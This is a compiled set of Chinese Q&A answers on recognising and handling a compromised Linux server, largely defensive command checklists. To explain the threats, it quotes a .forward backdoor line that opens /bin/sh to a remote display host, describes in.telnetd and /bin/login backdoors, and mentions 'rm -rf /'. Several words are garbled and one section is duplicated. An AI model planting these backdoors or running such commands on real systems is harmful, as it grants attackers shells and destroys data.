linux被入侵了

❶ 当公司里 linux 系统被入侵了，应该怎么办

也说两句，因为自己有服务器，自己维护，也曾经被一个三流小屁孩用“中国菜刀”给杀进来了，之后对注入，一句话木马了解了一下，说说我的看法。

一般来说系统层面的入侵机率比较低，本身服务器系统是挺安全的，不管是windows还是Linux或Unix，真正能从系统层入侵的牛人其实不多的。就像去年暴出的open ssl漏洞，其实真正实施地来难度不小，而且入侵之后能得到什么有价值的数据也未必。

在中国网上有挺多收费学习所谓的“黑客技术”的机构，充其量就是傻瓜式的破坏者，花钱别人卖套工具给你，教会你怎么用怎么看数据，然后就是开着机器不断的扫IP/域名/扫漏洞，扫到了就进一步傻瓜式的破坏或为所欲为。

就以“中国菜刀”来说，一句话木马或注入测试比较多，进系统以后win可以上传asp，php网页工具，能做的事就多了（看了你会吃一惊），包括可以在网页运行cmd命令，知道这是啥吧。Linux有难度，因为权限相当严格，可能跨一级目录连读写权限都没有了。所以侵入Linux能破坏，想不到有什么其它好处，除非这个管理员水平真的太差了。

在Linux下运行shell脚本都是需要权限的，要运行exe程序如果没有wine和同类软件那是不可能的，那为什么Linux还要装杀毒软件，其实是杀上传文件的毒，并不是为Linux服务器杀毒，仅用于检查存储的文件安全而已。说了这么多，相信你能明白Linux服务器的弱项并非来自系统，更多可能来自于web代码或业务系统。

最后在上面的基础上来回答你的问题，做好以下几点，损失会很小，如果你什么也没做，那结果难讲了。
1，平时备份好数据，所有人都这么说，其实业务系统最重要的是数据，业务程序本身价值不大。
2，初次安装业务系统时就应该把业务系统代码备份一份，以便在重新搭建环境时能快递恢复。
3，有了以上两点，就算入侵者得到了root权限，rm -rf /也不用怕，能很快恢复业务环境，数据损失大小在于你最后一次备份。且得到root不是件容易的事，现实中很难做到这一步。
4，发现被入侵后，我的做法是马上拔网线，你技术再怎么牛B，网线一拔，电源你关，你来咬我啊？要知道电源开关的权限高于一切。
5，找原因，从上面说的一堆废话中可以看出，先不要怀疑系统，如果你跑的是电商，BBS，或带有搜索功能的web，且用的是大型开源系统，建议你先官网看看最新运态，有没有其它人一样中招，官方有没有发部补丁。有就及时更新。
6，如果是系统问题，也要及时更新补丁。但记住：web被入侵的机率远远高于系统几个数量级。
7，不管是Linux或是windows，都建议安装杀软和网络安全狗或知名防火墙，网络安全狗更新更及时，效果我认为更好，对新的黑客技术的处理能力更强。
8，多余的提一下：如果是windows建议安装上还原软件，冰点（xp-win10），迅闪（2K3），很不错，只保护C盘，用于重启清除C盘被修改的地方，还原帐号，木马，病毒等。这个对Linux有点多余。被入后先重启电脑，断网再找原因。
9，Linux业务系统被入侵后，数据方面最多就是被删除或破坏不全，建议可以直接用。但业务系统的代码建议使用备份的复盖，你要知道web代码里可以插入ftp代码，工具代码，很难查出来，能干的事情又多。

其实那些Linux的服务器发行版默认设置的安全性都挺高的，多关心业务代码的安全性。至于被入侵后杀毒，我认为意义不大，入侵时杀软都没有发觉，入侵后再扫又能怎么样。还不如上面9点彻底。

❷ Linux服务器是否被攻击怎么判断

1、检查系统密码文件

首先从明显的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户，系统中uid为0的用户都会被显示出来。

1

awk –F:’$3==0{print$1}’/etc/passwd

顺便再检查一下系统里有没有空口令帐户：

1

awk –F: ‘length($2)==0{print$1}’/etc/shadow

2、查看一下进程，看看有没有奇怪的进程

重点查看进程：ps –aef | grep inetd

inetd是UNIX系统的守护进程，正常的inetd的pid都比较靠前，如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程，着重看inetd –s后面的内容。在正常情况下，LINUX系统中的inetd服务后面是没有-s参数的，当然也没有用inetd去启动某个文件；而solaris系统中也仅仅是inetd –s，同样没有用inetd去启动某个特定的文件；如果你使用ps命令看到inetd启动了某个文件，而你自己又没有用inetd启动这个文件，那就说明已经有人入侵了你的系统，并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息，尤其注意有没有以./xxx开头的进程。一旦发现异样的进程，经检查为入侵者留下的后门程序，立即运行kill –9 pid 开杀死该进程，然后再运行ps –aef查看该进程是否被杀死；一旦此类进程出现杀死以后又重新启动的现象，则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找：find / -name 程序名 –print，假设系统真的被入侵者放置了后门，根据找到的程序所在的目录，会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做，检测这种方法涉及到检查文件完整性，稍后我们再讨论这种方法。

接下来根据找到入侵者在服务器上的文件目录，一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetd.conf文件，输入：cat /etc/inetd.conf | grep –v “^#”，输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换in.xxx程序来创建一个后门，比如用/bin/sh 替换掉in.telnetd，然后重新启动inetd服务，那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an，列出本机所有的连接和监听的端口，查看有没有非法连接。

输入netstat –rn，查看本机的路由、网关设置是否正确。

输入 ifconfig –a，查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程，这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog，查看系统syslog进程的情况，判断syslog上次启动的时间是否正常，因为syslog是以root身份执行的，如果发现syslog被非法动过，那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp，包括messgae等文件的完整性和修改时间是否正常，这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法，典型的RPC攻击就是通过这种方式。这种方式有一定的成功率，也就是说它并不能100%保证成功入侵系统，而且通常会在服务器相应目录下产生core文件，全局查找系统中的core文件，输入find / -name core –exec ls –l {} ; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward

这是两种比较着名的后门文件，如果想检查你的系统是否被入侵者安装了后门，不妨全局查找这两个文件：

find / -name “.rhosts” –print

find / -name “.forward” –print

在某用户的$HOME下，.rhosts文件中仅包含两个+号是非常危险的，如果你的系统上开了513端口（rlogin端口，和telnet作用相同），那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

看到这里如果想要深入的做安全加固服务以及安全部署

就必须找专业做服务器的安全公司来处理了国内也就Sine安全和绿盟比较专业提供。

Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:

username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下，如果你运行如下命令：

ln -s /var/mail/luser ~/.forward

然后设置vacation有效，那么/var/mail/luser就会被拷贝到~/.forward，同时会附加"|/usr/bin/vacation me"，旧的symlink被移到~/.forward..BACKUP中。

直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法，通常我们通过输入ls –l 文件名来查询和比较文件，这种方法虽然简单，但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询，国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多，这里不一一赘述，可以man rpm来获得更多的格式。

UNIX系统中，/bin/login是被入侵者经常替换作为后门的文件，接下来谈一下login后门 ：

UNIX里，Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令，它将忽视管理员设置的口令让你长驱直入：这将允许入侵者进入任何账号，甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问，所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后，使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令，使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令，输入md5sum 文件名检查该文件的md5签名。它的使用格式如下：md5sum –b 使用二进制方式阅读文件；md5sum –c 逆向检查MD5签名；md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程，对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较，举个简单的例子，如果你开放了telnet服务，守护进程配置文件中就会有一句：telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd，检查该文件的完整性，入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件，检查该文件的完整性，可以直接cat /etc/crontab，仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷，即系统一旦重新启动，这个进程就被杀死了，所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序；这个方法怎么有点象查windows下的trojan？

说到这里，另外提一下，如果在某一目录下发现有属性为这样的文件：-rwsr-xr-x 1 root root xxx .sh，这个表明任何用户进来以后运行这个文件都可以获得一个rootshell，这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找，然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门，通常都是比较讨厌的，我常常就在想，遇到这种情况还是重新安装系统算了J，言归正传，首先，检查系统加载的模块，在LINUX系统下使用lsmod命令，在solaris系统下使用modinfo命令来查看。这里需要说明的是，一般默认安装的LINUX加载的模块都比较少，通常就是网卡的驱动；而solaris下就很多，没别的办法，只有一条一条地去分析。对内核进行加固后，应禁止插入或删除模块，从而保护系统的安全，否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_mole()和delete_mole()来达到上述目的。另外，对这个内核进行加固模块时应尽早进行，以防系统调用已经被入侵者替换。如果系统被加载了后门模块，但是在模块列表/proc/mole里又看不到它们，有可能是使用了hack工具来移除加载的模块，大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况，需要仔细查找/proc目录，根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录，当然可能这个目录是隐藏的。

❸ 如何看Linux服务器是否被攻击

以下几种方法检测linux服务器是否被攻击：
1、检查系统密码文件
首先从明显的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。
2、查看一下进程，看看有没有奇怪的进程

重点查看进程：ps –aef | grep inetd inetd是UNIX系统的守护进程，正常的inetd的pid都比较靠前，如果看到输出了一个类似inetd –s
/tmp/.xxx之类的进程，着重看inetd
–s后面的内容。在正常情况下，LINUX系统中的inetd服务后面是没有-s参数的，当然也没有用inetd去启动某个文件；而solaris系统中
也仅仅是inetd
–s，同样没有用inetd去启动某个特定的文件；如果使用ps命令看到inetd启动了某个文件，而自己又没有用inetd启动这个文件，那就说明已经有人入侵了系统，并且以root权限起了一个简单的后门。

❹ 如何看Linux服务器是否被攻击

以下几种方法检测linux服务器是否被攻击：
1、检查系统密码文件
首先从明显的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。
2、查看一下进程，看看有没有奇怪的进程

重点查看进程：ps –aef | grep inetd inetd是UNIX系统的守护进程，正常的inetd的pid都比较靠前，如果看到输出了一个类似inetd –s
/tmp/.xxx之类的进程，着重看inetd
–s后面的内容。在正常情况下，LINUX系统中的inetd服务后面是没有-s参数的，当然也没有用inetd去启动某个文件；而solaris系统中
也仅仅是inetd
–s，同样没有用inetd去启动某个特定的文件；如果使用ps命令看到inetd启动了某个文件，而自己又没有用inetd启动这个文件，那就说明已经有人入侵了系统，并且以root权限起了一个简单的后门。
3、检查系统守护进程
检查/etc/inetd.conf文件，输入：cat /etc/inetd.conf | grep –v “^#”，输出的信息就是这台机器所开启的远程服务。
一般入侵者可以通过直接替换in.xxx程序来创建一个后门，比如用/bin/sh 替换掉in.telnetd，然后重新启动inetd服务，那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。
4、检查网络连接和监听端口
输入netstat -an，列出本机所有的连接和监听的端口，查看有没有非法连接。
输入netstat –rn，查看本机的路由、网关设置是否正确。
输入 ifconfig –a，查看网卡设置。
5、检查系统日志
命令last |
more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程，这已经成为入侵者攻击的重要目标。入侵者通常会停止系
统的syslog，查看系统syslog进程的情况，判断syslog上次启动的时间是否正常，因为syslog是以root身份执行的，如果发现
syslog被非法动过，那说明有重大的入侵事件。
在linux下输入ls –al /var/log
检查wtmp utmp，包括messgae等文件的完整性和修改时间是否正常，这也是手工擦除入侵痕迹的一种方法。
6、检查系统中的core文件
通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法，典型的RPC攻击就是通过这种方式。这种方式有一定的成功率，也就是说并不能
100%保证成功入侵系统，而且通常会在服务器相应目录下产生core文件，全局查找系统中的core文件，输入find / -name core
–exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。
7、检查系统文件完整性
检查文件的完整性有多种方法，通常通过输入ls –l
文件名来查询和比较文件，这种方法虽然简单，但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V
`rpm –qf 文件名`
来查询，查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多，这里不一一赘述，可以man
rpm来获得更多的格式。

❺ Linux web服务器被入侵

你这种问题很难回答的，只能给你简单答一下。
1、怎么入侵的
你的是服务器，架上internet上，大家都可以访问。服务器为了方便别人访问，总会开启一些服务如http, ftp, ssh等等。黑客可以利用服务本身的漏洞或者套取密码（暴力破解、字典破解各种方式）获取一个有效的可以登录的用户，如果正好是root用户被破解，那你的机器就完全被他控制了。
2、文件是怎么放进来的？
获取到用户后，可以利用wget，或者sftp，ftp等各种方式把文件传进来。
3、如何防御？
这个最难回答，防御比进攻难。
你说开启了iptables, selinux，但是你有好好设置吗？
关掉不必要的端口减少被攻击的可能性；
经常更新你的系统，新的软件漏洞更少；
各种服务程序不要用root用户运行，免得黑客轻易利用程序问题获取root权限；

还有很多其它方法，网络安全和黑客性质一样，你要知道怎么攻击别人，你就会防御了。
现在你最好是先把服务器下线，处理好后再上线，免得在处理过程中受黑客干扰。

❻ Linux系统主机服务器被入侵后怎么办

入侵不严重的使用杀毒软件清理，并及时备案数据，然后如果可以的话，重做系统做好，以免有残留。
如果入侵严重并篡改密码的话，破解密码并保存数据后，重做系统，关闭高危端口。安装杀毒软件。
海腾数据晋慧娟

❼ 查找linux入侵证据的简单几个小技巧

要查找linux系统入侵证据，可从如下几个方面入手：
1.last，lastlog命令可查看最近登录的帐户及时间
2./var/log/secure , /var/log/messages日志信息可以通过accept关键字查看系统是否有被可疑IP地址登录成功信息。
3.用户任务计划，文件/var/spool/cron/tabs/用户，某些黑客会将后门程序，病毒设置为计划任务，定时执行
4.几个经常被放置木马，病毒的目录，/tmp, /var/tmp, /dev/shm由于这些目录都设置了SBIT，即所有用户都可读，可写，可执行。并且在访问这些目录的同时拥有root权限，所以即使黑客没有拿到root权限，在这些目录上传病毒，木马是非常方便的
5.通过时间来查找，find / -ctime n n为指定的时间，可通过上述找到的信息，综合判断，然后选取时间点，查找在那个时间点创建的文件。比如2天前的24小时内，就可用find / -ctime 2 > /tmp/file.log (如果不想刷屏，可重定向到文件）
6.各类服务日志，比如apache日志:
$APACHE_HOME/logs/access_log ,$APACHE_HOME/logs/error_log

❽ 如果linux被入侵了，黑客会做什么

留后门，然后集群继续爆破ssh服务器

而且不需要root用户，只需要一个可以登录tty的用户即可。

这些不是黑客做的，而是工具自动实现的，全自动

❾ Linux服务器被黑如何查

linux系统的服务器被入侵，总结了以下的基本方法，供不大懂linux服务器网理人员参考考学习。
首先先用iptraf查下，如果没装的运行yum install iptraf装下，看里面是不是UDP包发的很多，如果是，基本都被人装了后门
1. 检查帐户
# less /etc/passwd
# grep :0: /etc/passwd（检查是否产生了新用户，和UID、GID是0的用户）
# ls -l /etc/passwd（查看文件修改日期）
# awk -F: ‘$3= =0 {print $1}’ /etc/passwd（查看是否存在特权用户）
# awk -F: ‘length($2)= =0 {print $1}’ /etc/shadow（查看是否存在空口令帐户）

2. 检查日志
# last（查看正常情况下登录到本机的所有用户的历史记录）
注意”entered promiscuous mode”
注意错误信息
注 意Remote Procere Call (rpc) programs with a log entry that includes a large number (> 20) strange characters(-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM)

3. 检查进程
# ps -aux（注意UID是0的）
# lsof -p pid（察看该进程所打开端口和文件）
# cat /etc/inetd.conf | grep -v “^#”（检查守护进程）
检查隐藏进程
# ps -ef|awk ‘{print }’|sort -n|uniq >1
# ls /porc |sort -n|uniq >2
# diff 1 2

4. 检查文件
# find / -uid 0 –perm -4000 –print
# find / -size +10000k –print
# find / -name “…” –print
# find / -name “.. ” –print
# find / -name “. ” –print
# find / -name ” ” –print
注意SUID文件，可疑大于10M和空格文件
# find / -name core -exec ls -l {} ;（检查系统中的core文件）
检查系统文件完整性
# rpm –qf /bin/ls
# rpm -qf /bin/login
# md5sum –b 文件名
# md5sum –t 文件名

5. 检查RPM
# rpm –Va
输出格式：
S – File size differs
M – Mode differs (permissions)
5 – MD5 sum differs
D – Device number mismatch
L – readLink path mismatch
U – user ownership differs
G – group ownership differs
T – modification time differs
注意相关的 /sbin, /bin, /usr/sbin, and /usr/bin

6. 检查网络
# ip link | grep PROMISC（正常网卡不该在promisc模式，可能存在sniffer）
# lsof –i
# netstat –nap（察看不正常打开的TCP/UDP端口)
# arp –a

7. 检查计划任务
注意root和UID是0的schele
# crontab –u root –l
# cat /etc/crontab
# ls /etc/cron.*

8. 检查后门
# cat /etc/crontab
# ls /var/spool/cron/
# cat /etc/rc.d/rc.local
# ls /etc/rc.d
# ls /etc/rc3.d
# find / -type f -perm 4000

9. 检查内核模块
# lsmod

10. 检查系统服务
# chkconfig
# rpcinfo -p（查看RPC服务）

11. 检查rootkit
# rkhunter -c
# chkrootkit -q